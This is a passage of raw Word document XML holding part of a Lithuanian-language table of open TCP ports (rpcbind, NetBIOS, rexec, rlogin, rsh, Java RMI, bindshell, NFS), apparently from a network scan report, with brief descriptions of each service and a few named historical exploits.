              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="52E06E61" w14:textId="6C4BEDF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rpcbind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="06F76FEF" w14:textId="53F57376" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00ED536F" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED536F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>SUN Remote Procedure Call</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D8DDE7E" w14:textId="73E51EE1" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00ED536F"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Šiuo prievadu keliauja informacija tarp „Unix“ sistemų.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="729695A2" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="74F5C2A9" w14:textId="37F5F76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139/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1339B9BE" w14:textId="7221D574"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netbios-ssn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="28977AAD" w14:textId="6569BF8F" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00ED536F" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00ED536F">
              <w:t>NetBios</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Session</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED536F">
              <w:t xml:space="preserve"> Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="564A11B8" w14:textId="1798A56F" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00C80169" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Paslauga suteikia galimybę sujungti du kompiuterius „pokalbiui“, leidžia valdyti didelius pranešimus ir suteikia galimybę aptikti klaidas bei atstatyti pažeistus pranešimus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="0FA87E33" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="13466D35" w14:textId="1706C09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445/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0FD83B56" w14:textId="79167D9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netbios-ssn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="75691BBE" w14:textId="3E157D91" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00C80169" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00ED536F">
              <w:t>NetBios</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Session</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED536F">
              <w:t xml:space="preserve"> Service</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>naujesnė</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>versija</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C5A4F7E" w14:textId="4875EBC7" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00C80169" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Paslauga suteikia galimybę sujungti du kompiuterius „pokalbiui“, leidžia valdyti didelius pranešimus ir suteikia galimybę aptikti klaidas bei atstatyti pažeistus pranešimus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="5B0BB10C" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="272075E6" w14:textId="6EDC56C0"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512/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2357CD00" w14:textId="15F908C0"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exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A6047AC" w14:textId="4D287CB4" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00D64AB7" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D64AB7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Remote Execution Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5AAA870C" w14:textId="2B894E31" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00D64AB7" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Naudojamas paleisti programas ant nutolusio serverio, atrodant lyg, programos butu paleistos ant lokalaus įrenginio, perduodant duomenis iš lokalaus irenginio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="200D4B4B" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0C746E12" w14:textId="0DD1711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513/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69AF5186" w14:textId="38730AA9" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00D64AB7" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidR="00F0450F" w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05D7693C" w14:textId="509D7770" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="000378B9" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Remote Login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="33ECD753" w14:textId="43BAA350" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="000378B9" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Leidžia prisijungti prie nutolusio serverio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="62A56D66" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="68EA8B2F" w14:textId="4297663C"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514/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="08EA7500" w14:textId="4234CA3A" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="009C4819" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C4819">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
            <w:r w:rsidR="001E24E5">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25973C32" w14:textId="2F94AD0D" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="001E24E5" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Remote Shell (</w:t>
            </w:r>
            <w:r w:rsidRPr="001E24E5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Rsh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35ED10AC" w14:textId="3864E1C2" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00107F0B"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Komandinės eilutės programa, kuri gali paleisti shell komandas, kaip kitas naudotojas. Galimi išnaudojimai </w:t>
            </w:r>
            <w:r w:rsidRPr="001F6942">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>RPC Backdoor, Whacky, ADM worm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="5D04EA96" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="718AE87A" w14:textId="57D55F46"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1099/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="790593BE" w14:textId="2FB4F7DE"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java-rmi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6601D0F0" w14:textId="1C901E70" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00107F0B" w:rsidP="00107F0B">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00107F0B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Java Remote Method Invocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6EB97D32" w14:textId="0B317549" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00AB0B7B"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Paslauga leidžia kviesti metodus iš vieno Java virtualaus serverio </w:t>
            </w:r>
            <w:r w:rsidR="00CC5615">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>per kitą Java virtualų serverį.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="6E10A8AB" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="56B6E9DC" w14:textId="4C95C7A7"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1524/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="42367DE1" w14:textId="291940D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bindshell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3F87FC3A" w14:textId="45CD1311" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00042BB4" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Bind Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5EE40E97" w14:textId="7C432BBF" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00042BB4"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Tai yra shell tipkas, kuris pastoviai klausosi prisijungimų prie nustatyto port‘o. Atakuotojas gali prisijungti prie nustatyto port‘o, gauti prieigą prie shell </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="02C15818" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="64598A19" w14:textId="48DA270A"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2049/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5A13BD18" w14:textId="741892C8"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nfs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="424A1DA8" w14:textId="14FCE292" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00042BB4" w:rsidP="00042BB4">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Network File System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="30608B00" w14:textId="4241E9E2" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00042BB4" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
